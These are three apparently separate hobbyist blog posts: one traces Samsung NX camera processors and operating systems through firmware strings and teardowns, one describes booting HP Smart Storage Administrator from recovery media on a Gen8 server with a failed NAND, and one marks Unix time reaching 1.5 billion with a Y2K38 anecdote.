Hardware Overview
There is a Wikipedia list of all the released NX models that I took as my starting point. The main product line is centered around the NX mount, and the cameras have a "NXnnnn" numbering scheme, with "nnnn" being a number between one and four digits.
In addition, there is the Galaxy NX, which is an Android phone, but also has the NX mount and a DRIM engine DSP. This fascinating half-smartphone half-camera line began in 2012 with the Galaxy Camera and featured a few Android models with zoom lenses and different camera DSPs.
In 2014, Samsung introduced the NX
mini with a 1" sensor and the
"NX-M" lens mount, sharing much of the architecture with the larger NX models.
In 2015, they announced accidentally leaked the NX mini
2,
based on the DRIMeV SoC and running Linux, and even submitted it to the
FCC, but it never materialized on the market
after Samsung "shifted priorities". If you are the janitor in Samsung's R&D
offices, and you know where all the NX mini 2 prototypes are locked up, or if
you were involved in making them, I'd die to get my hands onto one of them!
Most of the NX cameras are built around different generations of the "DRIM engine" image processor, so it's worth looking at that as well.
The Ukrainian company photo-parts has a rather extensive list of NX model boards, even featuring a few well-made PCB photographs. While their page is quirky, the documentation is excellent and matches my findings. They have documented the DRIMe CPU generation for many, but not for all, NX cameras.
Origins of the DRIM engine
Apparently the first cameras introducing the DRIM engine ("Digital Real Image & Movie Engine") were the NV30/NV40 in 2008. Going through the service manuals of the NV cameras reveals the following:
- NV30 (the Samsung camera, not the Samsung laptop with the same model number): using the Milbeaut MB91686 image processor introduced in 2006
- NV40: also using the MB91686
- NV24: "TWE (MB91043)"
- NV100 (also called TL34HD in some regions): "DRIM II (MB91043)"
There are also some WB* camera models built around Milbeaut SoCs:
- WB200, WB250F, WB30F, WB800F: MB91696 (the SoC has "MB91696B" on it, the service manual claims "MB91696AM / M6M2-J"), firmware strings confirm "M6M2J"
This looks like the DRIM engine is a re-branded Milbeaut MB91686, and the DRIM engine II is a MB91043. Unfortunately, nothing public is known about the latter, and it doesn't look like anybody ever talked about this processor model.
Even more unfortunately, I wasn't able to find a (still working) firmware download for any of those cameras.
Firmware Downloads
Luckily, the firmware situation is better for the NX cameras. To find out more about each of them, I visited the respective Samsung support page and downloaded the latest firmware release. For the Android-based cameras however, firmware images are only available through shady "Samsung fan club" sites.
The first classification was provided by the firmware size, as there were distinct buckets. The first generation, NX5, NX10, and NX11 had (unzipped) sizes of ~15MB, the last generation NX1 and NX500 were beyond 350MB.
Googling for respective NX and "DRIM engine" press releases, PCB photos and other related materials helped identifying the specific generation. Sometimes, there were no press releases mentioning the SoC and I had to resort to PCB photos found online or made by myself or other NX enthusiasts.
Further information was obtained by checking the firmware files with strings
and
binwalk, with the details documented
below.
Note: most firmware files contain debug strings and file paths, often
mentioning the account name of the respective developer. Personal names of
Samsung developers are masked out in this blog post to protect the
guilty innocent.
Mirrorless Cameras
DRIMeII: NX10, NX5, NX11, NX100
The first NX camera released by Samsung was the NX10, so let's look into its
firmware. The ZIP contains an nx10.bin
, and running that through strings
-n 20
still yields some 11K unique entries.
There are no matches for "DRIM", but searching for "version", "revision", and "copyright" yields a few red herrings:
* Powered by [redacted] in DSLR team *
* This version apadpter for NX10 (16MB NOR) *
* Ice Updater v 0.025 (Base on FW Updater) *
* Hermes Firmware Version 0.00.001 (hit Enter for debugger prompt) *
* COPYRIGHT(c) 2008 SYRI *
It's barely possible to find out the details of those names after over a decade, and we still don't know which OS is powering the CPU.
One hint is provided by the source code reference in the binary:
D:\070628_view\NX10_DEV_MAIN\DSLR_PRODUCT\DSP\Project\CSP\..\..\Source\System\CSP\CSP_1.1_Gender\CSP_1.1\uITRON\Include\PCAlarm.h
This seems to be based on a "CSP", and feature "uITRON". The former might be the Samsung Core Software Platform, as identified by the following copyright notice in the firmware file:
Copyright (C) SAMSUNG Electronics Co.,Ltd.
SAMSUNG (R) Core SW Platform 2.0 for CSP 1.1
The latter is µITRON, a Japanese real-time OS specification going back to 1984. So let's assume the first camera generation (everything released in 2010) is powered by µITRON, as NX5, NX10 and NX11 have the same strings in their firmware files.
The NX100 is very similar to the above devices, but its firmware is roughly twice the size, given that it has a 32MB NOR flash (according to the bootloader strings). However, there are only 19MB of non-0x00, non-0xff data, and from comparing the extracted strings no significant new modules could be identified.
None of them identify the DRIM engine generation, but the NX10 service manual labels the CPU as "DSP (DRIMeII Pro)", so probably related to but slightly better than NV100's "DRIM II MB91043". Furthermore, all of these models are documented as "DRIM II" by photo-parts, and there is a well-readable PCB shot of the NX100 saying "DRIM engine IIP".
DRIMeIII: NX200, NX20, NX210, NX1000, NX1100
One year later, in 2011, Samsung released the NX200 powered by DRIM (engine) III. It is followed in 2012 by NX20, NX210, and NX1000/NX1100 (the only difference between the last two is a bundled Adobe Lightroom). The NX20 emphasizes professionalism, and the NX1x00 and NX2x0 stand for compact mobility.
The NX200 firmware also makes a significant leap to 77MB uncompressed, and the following models clock in at around 102MB uncompressed.
Each of the firwmare ZIPs contains two files respectively, named after the
model, e.g. nx200.Rom
and nx200.bin
. Binwalking the Rom
doesn't yield
anything of value, except roughly a dozen of artistic collage background
pictures. strings
confirms that it is some sort of filesystem not
identified by binwalk (and it contains a classical music compilation, with
tracks titled "01_Flohwalzer.mp3" to "20_Spring.mp3", each roughly a minute
long, sounding like ringtones from the 2000s)! The pictures and music files
can be extracted using PhotoRec.
The bin
binwalk yields a few interesting strings though:
8738896 0x855850 Unix path: /opt/windRiver6.6/vxworks-6.6/target/config/comps/src/edrStub.c
...
10172580 0x9B38A4 Copyright string: "Copyright (C) 2011, Arcsoft Inc."
10275754 0x9CCBAA Copyright string: "Copyright (c) 2000-2009 by FotoNation. All rights reserved."
10485554 0x9FFF32 Copyright string: "Copyright Wind River Systems, Inc., 1984-2007"
10495200 0xA024E0 VxWorks WIND kernel version "2.11"
So we have identified the OS as Wind River's VwWorks.
A strings
inspection of the bin
also gives us "ARM DRIMeIII - ARM926E
(ARM)" and "DRIMeIII H.264/AVC Encoder", confirming the SoC generation, weird
network stuff ("ftp password (pw) (blank = use rsh)"), and even some fancy
ASCII art:
]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
]]]]]]]]]]] ]]]] ]]]]]]]]]] ]] ]]]] (R)
] ]]]]]]]]] ]]]]]] ]]]]]]]] ]] ]]]]
]] ]]]]]]] ]]]]]]]] ]]]]]] ] ]] ]]]]
]]] ]]]]] ] ]]] ] ]]]] ]]] ]]]]]]]]] ]]]] ]] ]]]] ]] ]]]]]
]]]] ]]] ]] ] ]]] ]] ]]]]] ]]]]]] ]] ]]]]]]] ]]]] ]] ]]]]
]]]]] ] ]]]] ]]]]] ]]]]]]]] ]]]] ]] ]]]] ]]]]]]] ]]]]
]]]]]] ]]]]] ]]]]]] ] ]]]]] ]]]] ]] ]]]] ]]]]]]]] ]]]]
]]]]]]] ]]]]] ] ]]]]]] ] ]]] ]]]] ]] ]]]] ]]]] ]]]] ]]]]
]]]]]]]] ]]]]] ]]] ]]]]]]] ] ]]]]]]] ]]]] ]]]] ]]]] ]]]]]
]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
]]]]]]]]]]]]]]]]]]]]]]]]]]]]] Development System
]]]]]]]]]]]]]]]]]]]]]]]]]]]]
]]]]]]]]]]]]]]]]]]]]]]]]]]]
]]]]]]]]]]]]]]]]]]]]]]]]]] KERNEL:
]]]]]]]]]]]]]]]]]]]]]]]]] Copyright Wind River Systems, Inc., 1984-2007
The 2012 models (NX20, NX210, NX1000, NX1100) contain the same copyright and CPU identification strings after a cursory look, confirming the same info about the third DRIMe generation.
Side note: there is also a compact camera from early 2010, the WB2000/TL350 (EU/US name), also built around the DRIMeIII and also running VxWorks. It looks like it was developed in parallel to the DRIMeII based NX10!
Another camera based on DRIMeIII and VxWorks is the EX2F from 2012.
DRIMeIV, Tizen Linux: NX300(M), NX310, NX2000, NX30
In early 2013, Samsung gave a CES press conference announcing the DRIMe IV based NX300. Linux was not mentioned, but we got a novelty single-lens 3D feature and an AMOLED screen. Samsung also published a design overview of the NX300 evolution.
I've looked into the NX300 root filesystem back in
2014, and the CPU generation was also
confirmed from /proc/cpuinfo
:
Hardware : Samsung-DRIMeIV-NX300
The NX310 is just an NX300 with additional bundled gimmicks, sharing the same firmware. The actual successor to the NX300 is the NX2000, featuring a large AMOLED and almost no physical buttons (why would anybody buy a camera without knobs and dials?). It's followed by the NX300M (a variant of the NX300 with a 180° tilting screen), and the NX30 (released 2014, a larger variant with eVF and built-in flash).
All of them have similarly sized and named firmware (nx300.bin
), and the
respective OSS downloads feature a TIZEN
folder. All are running Linux
kernel 3.5.0. There is a nice description of the firmware file
structure by
Douglas J. Hickok. The bin
files begin with SLP\x00
, probably for "Samsung
Linux Platform", and thus I documented them as SLP Firmware
Format
and created an SLP firmware
dumper.
Fujitsu M7MU: NX mini, NX3000, NX3300
In the first half of 2014, the NX mini was announced. It also features WiFi and NFC, and with its NX-M mount it is one of the smallest digital interchangeable-lens cameras out there! The editor notes reveal that it's based on the "M7MU" DSP, which unfortunately is impossible to google for.
The firmware archive contains a file called DATANXmini.bin
(which is not the
SLP format and also a break with the old-school 8.3 filename
convention), and it seems to
use some sort of data compression, as most strings are garbled after 16
bytes or earlier (C:\colomia\Gui^@^@Lib\Sources\Core^@^PAllocator.H
, here
using Vim's binary escape notation).
There are a few string matches for "M7MU", but nothing that would reveal details about its manufacturer or operating system. The (garbled) copyright strings give a mixed picture, with mentions of:
- ArcSoft
- FotoNation (face detection?)
- InterNiche Technologies (probably for their IPv4 network stack)
- DigitalOptics Corporation (optical systems)
- Jouni Malinen and contributors, with something that looks like a GPL header(!?!?):
Copyright (c) 2<80>^@^@5-2011, Jouni Ma^@^@linen <*@**.**>
^@^@and contributors^@^B^@This program ^@^Kf^@^@ree software. Yo!
u ^@q dis^C4e it^AF/^@<9c>m^D^@odify^@^Q
under theA^@ P+ms of^B^MGNU Gene^A^@ral Pub^@<bc> License^D^E versPy 2.
This doesn't give us any hints on what is powering this nice curiosity of ILC. The few PCB photos available on the internet have the CPU covered with a sticker, so no dice there either. All of the above similarly applies to the NX3000, which is running very similar code but has the larger NX mount, and the NX3300, which is a slightly modified NX3000 with more selfie shooting and less Adobe Lightroom.
It took me quite a while of fruitless guessing, until I was able to obtain a (broken) NX3000 and disassemble it, just to remove the CPU sticker.
The sticker revealed that the CPU is actually an "MB86S22A", another Fujitsu Milbeaut Image Processor, with M-7M being the seventh generation (not sure about "MU", but there is "MO" for mobile devices), built around the ARM Cortex-A5MP core!
Github code search reveals that there is actually an M7MU driver in the forked Exynos Linux kernel, and it defines the firmware header structure. Let's hack together a header reader in python real quick now, and run that over the NX mini firmware:
Header | Value |
---|---|
block_size | 0x400 (1024) |
writer_load_size | 0x4fc00 (326656) |
write_code_entry | 0x40000400 (1073742848) |
sdram_param_size | 0x90 (144) |
nand_param_size | 0xe1 (225) |
sdram_data | *stripped 144 bytes* |
nand_data | *stripped 225 bytes* |
code_size | 0xafee12 (11529746) |
offset_code | 0x50000 (327680) |
version1 | "01.10" |
log | "201501162119" |
version2 | "GLUAOA2" |
model | "NXMINI" |
section_info | 00000007 00000001 0050e66c 00000002 001a5985 00000003 00000010 00000004 00061d14 00000005 003e89d6 00000006 00000010 00000007 00000010 00000000 9x 00000000 |
pdr | "" |
ddr | 00 b3 3f db 26 02 08 00 d7 31 08 29 01 80 00 7c 8c 07 |
epcr | 00 00 3c db 00 00 08 30 26 00 f8 38 00 00 00 3c 0c 07 |
That was less than informative. At least it's a good hint for loading the firmware into a decompiler, if anybody gets interested enough.
But why should the Linux kernel have a module to talk to an M7MU? One of the
kernel trees containing that code is called kernel_samsung_exynos5260
and the
Exynos 5260 is the SoC powering the Galaxy K
Zoom. So
the K Zoom does have a regular Exynos SoC running Android, and a second
Milbeaut SoC running the image processing. Let's postpone this Android
hybrid for now.
DRIMeV, Tizen Linux: NX1, NX500, Gear360
In late 2014, Samsung released the high-end DRIMeV-based NX1, featuring a backside-illuminated 28 MP sensor and 4K H.256 video in addition to all the features of previous NX models. There was also an interview with a very excited Samsung Senior Marketing Manager that contains PCB shots and technical details. Once again, Linux is only mentioned in third-party coverage, e.g. in the EOSHD review.
In February 2015, the NX1 was followed by the more compact NX500 based around a slightly reduced DRIMeVs SoC. Apparently, the DRIMeVs also powers the Gear 360 camera, and indeed, there is a teardown with PCB shots confirming that and showing an additional MachXO3 FPGA, but also some firmware reverse-engineering as well as firmware mirroring efforts. The Gear360 is running Tizen 2.2.0 "Magnolia" and requires a companion app for most of its functions.
The NX1 is using the same modified version of the SLP firmware format as the
Gear360. In versions before 1.21, the ext4 partitions were uncompressed,
leading to significantly larger bin
file sizes. They still contain Linux
3.5.0 but ext4 is a significant change over the
UBIFS on the DRIMeIV cameras, and
allows in-place modification from a telnet shell.
Android phones with dedicated photo co-processor
Samsung has also experimented with hybrid devices that are neither smartphone nor camera. The first such device seems to be the Galaxy Camera from 2012.
The Android firmware ZIP files (obtained from a Samsung "fan club"
website) contain one or multiple tar.md5
files (which are tar archives with
appended MD5 checksums to be flashed by
Odin).
Galaxy Camera (EK-GC100, EK-GC120)
For the Galaxy Camera EK-GC100, there is a
CODE_GC100XXBLL7_751817_REV00_user_low_ship.tar.md5
in the ZIP, that
contains multiple .img
files:
-rw-r--r-- se.infra/se.infra 887040 2012-12-26 12:12 sboot.bin
-rw-r--r-- se.infra/se.infra 768000 2012-12-26 11:41 param.bin
-rw-r--r-- se.infra/se.infra 159744 2012-12-26 12:12 tz.img
-rw-r--r-- se.infra/se.infra 4980992 2012-12-26 12:12 boot.img
-rw-r--r-- se.infra/se.infra 5691648 2012-12-26 12:12 recovery.img
-rw------- se.infra/se.infra 1125697212 2012-12-26 12:11 system.img
None of these look like camera firmware, but system.img
is the Android
rootfs (A sparse image convertible with
simg2img to obtain an ext4
image). In the rootfs, /vendor/firmware/
contains a few files, including one
fimc_is_fw.bin
with 1.2MB.
The Galaxy Camera Linux source has an Exynos FIMC-IS (Image Subsystem) driver working over I2C, and the firmware itself contains a few interesting strings:
src\FIMCISV15_HWPF\SIRC_SDK\SIRC_Src\ISP_GISP_HQ_ThSc.c
* S5PC220-A5 - Solution F/W *
* since 2010.05.21 for ISP Team *
SIRC-ISP-SDK-R1.02.00
https://svn/svn/SVNRoot/System/Software/tcevb/SDK+FW/branches/Pegasus-2012_01_12-Release
"isp_hardware_version" : "Fimc31"
Furthermore, the firmware bin file seems to start with a typical ARM v7 reset vector table, but other than that it looks like the image processsor is a built-in component of the Exynos4 SoC.
Galaxy S4 Zoom: SM-C1010, SM-C101, SM-C105
The next Android hybrid released by Samsung was the Galaxy S4
Zoom
(SM-C1010, SM-C101, SM-C105) in 2013. In its CODE_[...].tar.md5
firmware, there is an additional 2MB camera.bin
file that contains the
camera processor firmware. Binwalk only reveals a few FotoNation copyright
strings, but strings
gives some more interesting
hints, like:
SOFTUNE REALOS/ARM is REALtime OS for ARM.COPYRIGHT(C) FUJITSU MICROELECTRONICS LIMITED 1999
M9MOFujitsuFMSL
AHFD Face Detection Library M9Mo v.1.0.2.6.4
Copyright (c) 2005-2011 by FotoNation. All rights reserved.
LibFE M9Mo v.0.2.0.4
Copyright (c) 2005-2011 by FotoNation. All rights reserved.
FCGK02 Fujitsu M9MO
Softune is an IDE used by Fujitsu and Infineon for embedded processors, featuring the REALOS µITRON real-time OS!
M9MO sounds like a 9th generation Milbeaut image processor, but again there is not much to see without the model number, and it's hard to find good PCB shots without stickers. There is a S4 Zoom disassembly guide featuring quite a few PCB shots, but the top side only shows the Exynos SoC, eMMC flash and an Intel baseband. There are uncovered bottom pics submtted to FCC which are too low-res to identify if there is a dedicated SoC.
As shown above, Samsung has a history of working with Milbeaut and µITRON, so it's probably not a stretch to conclude that this combination powers the S4 Zoom's camera, but it's hard to say if it's a logical core inside the Exynos 4212 or a dedicated chip.
Galaxy NX: EK-GN100, EK-GN120
Just one week after the S4 Zoom, still in June 2013, Samsung announced the Galaxy NX (EK-GN100, EK-GN120) with interchangeable lenses, 20.3MP APS-C sensor, and DRIMeIV SoC - specs already known from January's NX300.
But the Galaxy NX is also an Android 4.2 smartphone (even if it lacks microphone and speakers, so technically just a micro-tablet?). How can it be a DRIMeIV Linux device and an Android phone at the same time? The firmware surely will enlighten us!
Similarly to the S4 Zoom, the firmware is a ZIP file containing a
[...]_HOME.tar.md5
. One of the files inside it is camera.bin
, and this
time it's 77MB! This file now features the SLP\x00
header known from the
NX300:
camera.bin: GALAXYU firmware 0.01 (D20D0LAHB01) with 5 partitions
144 5523488 f68a86 ffffffff vImage
5523632 7356 ad4b0983 7fffffff D4_IPL.bin
5530988 63768 3d31ae89 65ffffff D4_PNLBL.bin
5594756 2051280 b8966d27 543fffff uImage
7646036 71565312 4c5a14bc 4321ffff platform.img
The platform.img
file contains a UBIFS root partition, and presumably vImage
is used for upgrading the DRIMeIV firmware, and uImage is the standard kernel
running on the camera SoC. The rootfs is very similar to the NX300 as well,
featuring the same "squeeze/sid" string in /etc/debian_version
, even though
it's again Tizen / Samsung Linux Platform. There is a 500KB
/usr/bin/di-galaxyu-app
that's probably responsible for camera operation
as well as for talking to the Android CPU. Further reverse engineering is
required to understand what kind of IPC mechanism is used between the cores.
The Galaxy NX got the CES 2014 award for the first fully-connected interchangeable lens camera, but probably not for fully-connecting a SoC running Android-flavored Linux with a SoC running Tizen-flavored Linux on the same board.
Galaxy Camera 2
Shortly after the Galaxy NX, the Galaxy Camera 2 (EK-GC200) was announced and presented at CES 2014.
Very similar to the first Galaxy Camera, it has a 1.2MB
/vendor/firmware/fimc_is_fw.bin
file, and also shares most of the strings
with it. Apart from a few changed internal SVN URLs, this seems to be roughly
the same module.
Galaxy K Zoom: SM-C115, SM-C111, SM-C115L
As already identified above, the Galaxy K
Zoom
(SM-C115, SM-C111, SM-C115L), released in June 2014, is using the M7M image
processor. The respective firmware can be found inside the Android rootfs at
/vendor/firmware/RS_M7MU.bin
and is 6.2MB large. It also features the same
compression mechanism as the NX mini firmware, making it harder to analyze,
but the M7MU firmware header looks more consistent:
Header | Value |
---|---|
code_size | 0x5dee12 (6155794) |
offset_code | 0x40000 (262144) |
version1 | "00.01" |
log | "201405289234" |
version2 | "D20FSHE" |
model | "06DAGCM2" |
Rumors of unreleased models
During (and after) Samsung's involvement in the camera market, there were many rumors of shiny new models that didn't materialize. Here is an attempt to classify the press coverage without any insider knowledge:
Samsung NX-R (concept design, R for retro?), September 2012 - most probably an early name of the NX2000 (the front is very similar, no pictures of the back).
Samsung NX400 / NX400-EVF, July 2014 - looks like the NX400 was renamed to NX500, and an EVF version never materialized.
Samsung NX2 prototype, February 2018 - might be a joke/troll or an engineer having some fun. Three years after closing the camera department, it's hard to imagine that somebody produced a 30MP APS-C sensor out of thin air, added a PCB with a modern SoC to read it out, and created (preliminary) firmware.
Samsung NX Ultra, April 1st 2020, 'nuff said.
Conclusion
In just five years, Samsung released eighteen cameras and one smartphone/camera hybrid under the NX label, plus a few more phones with zoom lenses, built around the Fujitsu Milbeaut SoC as well as multiple generations of Samsung's custom-engineered (or maybe initially licensed from Fujitsu?) DRIM engine.
The number of different platforms and overlapping release cycles is a strong indication that the devices were developed by two or three product teams in parallel, or maybe even independently of each other. This engineering effort could have proven a huge success with amateur and professional photographers, if it hadn't been stopped by Samsung management.
To this day, the Tizen-based NX models remain the best trade-off between picture quality and hackability (in the most positive meaning).
(*) All pictures (C) Samsung marketing material
This post describes how to start "Intelligent Provisioning" or the "HP Smart Storage Administrator (ACU / SSA)" on a Gen8 server with a broken NAND, so that you can change the boot disk order. It has been successfully tested on the HPE MicroServer Gen8 as well as on a ProLiant ML310e Gen8, using either a USB drive or a µSD / SD card with at least 1GB of capacity.
Update 2021-05-17: to consistently boot from an SSD in port 5, switch to Legacy SATA mode. See below for details.
Changing the Boot Disk
HP Gen8 servers in AHCI mode will always try to boot from the first disk in the (non-)hot-swap drive bay, and completely ignore the other disks you have attached.
The absolutely non-obvious way to change the boot device, as outlined in a well-hidden comment on the HP forum, is:
- Change the SATA mode from "AHCI" to "RAID" in BIOS
- Ignore the nasty red and orange warning about losing all your data
- Boot into HP "Smart" Storage Administrator
- Create a single logical disk of type RAID0
- Add the desired boot device (and only it!) to the RAID0
- Profit!
The disks in the drive bay will become invisible as boot devices / to your GRUB, but they will keep working as before under your operating system, and there seems to be no negative impact on the boot device either.
This is great advice, provided that you are actually able to boot into SSA (by
pressing F5
at the right moment during your bootup process).
WARNING / Update 2020-10-07: apparently, booting from an SSD on the ODD port (SATA port 5) is not supported by HPE, so it is a pure coincidence that it is possible to set up, and your server will eventually forget the RAID configuration of the ODD port, falling back to whatever boot device is in the first non-hot-plug bay. This has happened to me on the ML310e, but not on the MicroServer (as reported in the forum) yet.
Update 2021-05-17: after another reboot-induced RAID config loss, I have done some more research and found this suggestion to switch to Legacy SATA mode. Another source in German. I have followed it:
- Reboot into BIOS Setup (press
F9
), switch to Legacy SATA- System Options
- SATA Controller Options
- Embedded SATA Configuration
- SATA Legacy Support
- Embedded SATA Configuration
- SATA Controller Options
- System Options
- Reboot into BIOS Setup (press F9), switch boot controller Order
- Boot Controller Order
- Ctlr:2
- Boot Controller Order
- Optional 😉: shut down the box and swap the cables on ports 5 and 6.
- Profit!
My initial fear that the "Legacy" mode would cause a performance downgrade so far didn't materialize. The devices are still operated in the fastest SATA mode supported on the respective port, and NCQ seems to work as well.
The Error Message
However, for some time now, my HP MicroServer Gen8 has been showing one of those nasty NAND / Flash / SD-Card / whatever error messages:
- iLO Self-Test reports a problem with: Embedded Flash/SD-CARD. View details on Diagnostics page.
- Controller firmware revision 2.10.00 Partition Table Read Error: Could not partition embedded media device
- Embedded Flash/SD-CARD: Embedded media initialization failed due to media write-verify test failure.
- Embedded Flash/SD-CARD: Failed restart..
..or a variation thereof. I have ignored it because I thought it referred to the SD card and it didn't impact the server in noticeable ways.
At least not until I wanted to make the shiny new SSD that I bought the
default boot device for the server, which is when I realized that neither the
F5
key to run HP's "Smart" Storage Administrator tool, nor the F10
key
for the "Intelligent" Provisioning tool (do you notice a theme on their
naming?) had any effect on the boot process.
The "Official" Solution
The general advice from the Internet to "fix" this error is to repeat the following steps in random order, multiple times:
- Disconnect mains power for some minutes
- "Format Embedded Flash and reset iLO" from the iLO web interface
- "Reset iLO" from the iLO web interface
- Reset the CMOS settings from the F9 menu
- Reset the iLO settings via mainboard jumpers
- Downgrade iLO to 2.54
- Upgrade iLO to the latest version
- Send a custom XML via HPQLOCFG.exe
And once the error is fixed, to boot the Install Provisioning Recovery Media to put back the right data onto the NAND.
I've tried the various suggestions (except for the iLO downgrade, because the HTML5 console introduced in 2.70 is the only one not requiring arcane legacy browsers), but the error remained.
So I tried to install the provisioning recovery media nevertheless, but it failed with the anticipated "Error flashing the NVRAM":
(it will not boot the ISO if you just dd
it to an USB flash drive, but you
can put it on a DVD or use the "Virtual Media" gimmick on a licensed iLO)
If none of the above "fixes" work, then your NAND chip is probably faulty indeed and thus the final advice given is:
- Contact HPE for a replacement motherboard
However, my MicroServer is out of warranty and I'm not keen on waiting for weeks or months for replacement and shelling out real money on top.
Booting directly into SSA / IP
But that fancy HPIP171.2019_0220.23.iso
we downloaded to repair the
NAND surely contains what we need, in some heavily obfuscated form?
Let's mount it as a loopback device and find out!
# mount HPIP171.2019_0220.23.iso -o loop /media/cdrom/
# cd /media/cdrom/
# ls -al
total 65
drwxrwxrwx 1 root root 2048 Feb 21 2019 ./
drwxr-xr-x 5 root root 4096 Sep 11 18:41 ../
-rw-rw-rw- 1 root root 34541 Feb 21 2019 back.jpg
drwxrwxrwx 1 root root 2048 Feb 21 2019 boot/
-r--r--r-- 1 root root 2048 Feb 21 2019 boot.catalog
drwxrwxrwx 1 root root 2048 Feb 21 2019 efi/
-rw-rw-rw- 1 root root 2913 Feb 21 2019 font_15.fnt
-rw-rw-rw- 1 root root 3843 Feb 21 2019 font_18.fnt
drwxrwxrwx 1 root root 2048 Feb 21 2019 ip/
drwxrwxrwx 1 root root 2048 Feb 21 2019 pxe/
drwxrwxrwx 1 root root 6144 Feb 21 2019 system/
drwxrwxrwx 1 root root 2048 Feb 21 2019 usb/
# du -sm */
2 boot/
5 efi/
916 ip/
67 pxe/
30 system/
4 usb/
# ls -al ip/
total 937236
drwxrwxrwx 1 root root 2048 Feb 21 2019 ./
drwxrwxrwx 1 root root 2048 Feb 21 2019 ../
-rw-r-xr-x 1 root root 125913644 Feb 21 2019 bigvid.img.gz*
-rw-r-xr-x 1 root root 706750514 Feb 21 2019 gaius.img.gz*
-rw-r-xr-x 1 root root 114 Feb 21 2019 manifest.json*
-rw-rw-rw- 1 root root 140 Feb 21 2019 md5s.txt
-rw-rw-rw- 1 root root 164 Feb 21 2019 sha1sums.txt
-rw-r-xr-x 1 root root 127058868 Feb 21 2019 vid.img.gz*
# zcat ip/gaius.img.gz | file -
/dev/stdin: DOS/MBR boot sector
The ip
directory contains the largest payload of that ISO, and all three
.img.gz
files look like disk images, with exactly 256MB (vid
), 512MB
(bigvid
) and 1024MB (gaius
) extracted sizes.
Following the "bigger is better" slogan, let's write the biggest one,
gaius.img.gz
to an USB flash drive and see what happens!
# # replace /dev/sdc below with your flash drive device!
# zcat gaius.img.gz |dd of=/dev/sdc bs=1M status=progress
... wait a while ...
# reboot
Then, on boot-up, select the "USB DriveKey" option:
And you will be greeted by a friendly black & white GRUB loader, offering you "Intelligent" Provisioning and "Smart" Storage Administrator, which you can promptly and successfully boot:
From here, you can create a single logical volume of type RAID0, add just your boot disk into it, restart and be happy!
The Bill-and-a-half-ennium
Tonight (2017-07-14), at or around 02:40:00 GMT, the Unix time will have a value of 1 500 000 000 seconds, counting from January 1st, 1970. The last event of this kind, when Unix time reached 1 000 000 000 seconds, has been on September 9th, 2001, when the world still was a nice and good place. Because that was a billion seconds, some people incorrectly called it the "Billennium". Yours truly actually stayed up late enough (01:46 GMT) to celebrate the event with a hacker friend.
If you want to celebrate this special decimal representation of an arcane time measure, there is a nice countdown page!
The next one of this kind, 2 000 000 000, will be in 2033, so you better party hard this time!
The Year 2038 Problem (Y2K38)
This is also a good reminder of the many systems that are still using Unix time internally, and the legacy and embedded ones that store it in a 32-bit signed integer. Because this kind of integer overflows at 2 147 483 647, which will happen in 2038, all kinds of problems are expected.
There is already a great writeup on the current state of affairs regarding Y2K38 support, so instead of an in-depth technical analysis I'm going to provide a personal anecdote.
My first encounter with Y2K38 was in 2002 - a phone call from a relative who had trouble logging into an SSH server using PuTTY. It took some time to figure out the root cause - a dead CMOS battery in the PC led to incorrect clock values, bringing the machine far into the future, some time into the 2040ies.
Being a good citizen, I reported the bug to the developers (with a detailed explanation of the setup and a stack trace), and got a rather laconic answer:
Date: 11 Feb 2002 22:54:52
Subject: putty crashing on time() overflowGeorg Lukas writes:
putty is crashin with an access violation when you try to connect to a host and it is after time() goes over 232 (i.e. after Tue, 19 Jan 2038 04:14:07 +0100).
Thanks for the timely bug report. With a bit of luck we'll fix this one before it becomes a problem for too many users.
(S)
I haven't quite followed up, but recent versions of PuTTY, on a recent 64-bit Windows, don't exhibit this problem any more, so it looks like we are safe!
Future
While we still have a bit more than 20 years to fix Y2K38, I'm sure that there will be plenty of legacy 32-bit systems running when the date approaches. As with Y2K, there will be denial, anger, bargaining, depression and acceptance. And maybe a big boom that brings down the whole IT, however it might look in 20 years.
One way or the other, I will be a professional Y2K38 consultant with 36 years of working experience! Please contact me soon so I can ensure a timely retirement to some far-away island before day X! ;-)